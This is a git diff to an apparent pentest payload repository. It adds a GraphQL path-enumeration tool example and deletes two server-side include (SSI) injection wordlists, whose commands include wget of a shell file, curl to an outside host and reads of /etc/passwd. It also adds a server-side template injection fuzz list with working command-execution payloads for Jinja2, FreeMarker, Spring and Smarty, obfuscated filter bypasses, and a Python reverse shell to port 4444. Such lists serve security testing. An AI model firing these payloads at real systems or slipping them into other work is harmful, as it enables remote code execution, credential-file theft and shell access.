diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md
index 4c750a3..12734ff 100644
--- a/GraphQL Injection/README.md	
+++ b/GraphQL Injection/README.md	
@@ -24,6 +24,7 @@
 * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
 * [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/)
 * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
+* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum)
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
 * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
 * [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
@@ -155,6 +156,28 @@ query IntrospectionQuery {
 }
 ```
 
+### List path
+
+```php
+$ git clone https://gitlab.com/dee-see/graphql-path-enum
+$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
+Found 27 ways to reach the "Skill" node from the "Query" node:
+- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
+- Query (query) -> Query (skills) -> Skill
+```
 
 ### Extract data
 
diff --git a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt b/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt
deleted file mode 100644
index 9b7ba08..0000000
--- a/Server Side Template Injection/Intruder/JHADDIX_SSI_Injection.txt	
+++ /dev/null
@@ -1,75 +0,0 @@
-<pre><!--#exec cmd="ls" --></pre>
-<pre><!--#echo var="DATE_LOCAL" --> </pre>
-<pre><!--#exec cmd="whoami"--></pre>
-<pre><!--#exec cmd="dir" --></pre>
-<!--#exec cmd="ls" -->
-<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
-<!--#exec cmd="/bin/ls /" -->
-<!--#exec cmd="dir" -->
-<!--#exec cmd="cd C:\WINDOWS\System32">
-<!--#config errmsg="File not found, informs users and password"-->
-<!--#echo var="DOCUMENT_NAME" -->
-<!--#echo var="DOCUMENT_URI" -->
-<!--#config timefmt="A %B %d %Y %r"-->
-<!--#fsize file="ssi.shtml" -->
-<!--#include file=?UUUUUUUU...UU?-->
-<!--#echo var="DATE_LOCAL" --> 
-<!--#exec cmd="whoami"--> 
-<!--#printenv -->
-<!--#flastmod virtual="echo.html" -->
-<!--#echo var="auth_type" -->
-<!--#echo var="http_referer" -->
-<!--#echo var="content_length" -->
-<!--#echo var="content_type" -->
-<!--#echo var="http_accept_encoding" -->
-<!--#echo var="forwarded" -->
-<!--#echo var="document_uri" -->
-<!--#echo var="date_gmt" -->
-<!--#echo var="date_local" -->
-<!--#echo var="document_name" -->
-<!--#echo var="document_root" -->
-<!--#echo var="from" -->
-<!--#echo var="gateway_interface" -->
-<!--#echo var="http_accept" -->
-<!--#echo var="http_accept_charset" -->
-<!--#echo var="http_accept_language" -->
-<!--#echo var="http_connection" -->
-<!--#echo var="http_cookie" -->
-<!--#echo var="http_form" -->
-<!--#echo var="http_host" -->
-<!--#echo var="user_name" -->
-<!--#echo var="unique_id" -->
-<!--#echo var="tz" -->
-<!--#echo var="total_hits" -->
-<!--#echo var="server_software" -->
-<!--#echo var="server_protocol" -->
-<!--#echo var="server_port" -->
-<!--#echo var="server_name -->
-<!--#echo var="server_addr" -->
-<!--#echo var="server_admin" -->
-<!--#echo var="script_url" -->
-<!--#echo var="script_uri" -->
-<!--#echo var="script_name" -->
-<!--#echo var="script_filename" -->
-<!--#echo var="netsite_root" -->
-<!--#echo var="site_htmlroot" -->
-<!--#echo var="path_translated" -->
-<!--#echo var="path_info_translated" -->
-<!--#echo var="request_uri" -->
-<!--#echo var="request_method" -->	
-<!--#echo var="remote_user" -->
-<!--#echo var="remote_addr" -->
-<!--#echo var="http_client_ip" -->
-<!--#echo var="remote_port" -->
-<!--#echo var="remote_ident" -->
-<!--#echo var="remote_host" -->
-<!--#echo var="query_string_unescaped" -->
-<!--#echo var="query_string" -->
-<!--#echo var="path_translated" -->
-<!--#echo var="path_info" -->
-<!--#echo var="path" -->
-<!--#echo var="page_count" -->
-<!--#echo var="last_modified" -->
-<!--#echo var="http_user_agent" -->
-<!--#echo var="http_ua_os" -->
-<!--#echo var="http_ua_cpu" -->
diff --git a/Server Side Template Injection/Intruder/ssi_quick.txt b/Server Side Template Injection/Intruder/ssi_quick.txt
deleted file mode 100644
index fef3ab2..0000000
--- a/Server Side Template Injection/Intruder/ssi_quick.txt	
+++ /dev/null
@@ -1,18 +0,0 @@
-</nowiki>
-<!--#echo var="DOCUMENT_NAME" -->
-<!--#echo var="DOCUMENT_URI" -->
-<!--#config timefmt="A %B %d %Y %r"-->
-<!--#echo var="DATE_LOCAL" -->
-<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
-<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
-<!--#include virtual="/" -->
-<!--#exec cmd="ls" -->
-<!--#exec cmd="whoami" -->
-<!--#exec cmd="uname" -->
-<!--#exec cmd="dir" -->
-<!--#exec cmd="cat /etc/passwd" -->
-<!--#exec cmd="ipconfig" -->
-<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
-<!--#exec cmd="perl -e 'print "X"*5000'" -->
-<!--#exec cmd="sleep 5" -->
-<!--#exec cmd="sleep 10" -->
diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz
new file mode 100644
index 0000000..ced385b
--- /dev/null
+++ b/Server Side Template Injection/Intruder/ssti.fuzz	
@@ -0,0 +1,49 @@
+
+{{4*4}}[[5*5]]
+{{7*7}}
+{{7*'7'}}
+<%= 7 * 7 %>
+${3*3}
+${{7*7}}
+@(1+2)
+#{3*3}
+#{ 7 * 7 }
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
+{{config.items()}}
+{{ [].class.base.subclasses() }}
+{{''.class.mro()[1].subclasses()}}
+{{ ''.__class__.__mro__[2].__subclasses__() }}
+{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
+{{'a'.toUpperCase()}} 
+{{ request }}
+{{self}}
+<%= File.open('/etc/passwd').read %>
+<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
+{{app.request.query.filter(0,0,1024,{'options':'system'})}}
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
+{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
+{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+{$smarty.version}
+{php}echo `id`;{/php}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
+{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
+{{request|attr(["_"*2,"class","_"*2]|join)}}
+{{request|attr(["__","class","__"]|join)}}
+{{request|attr("__class__")}}
+{{request.__class__}}
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+${T(java.lang.System).getenv()}
+${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
\ No newline at end of file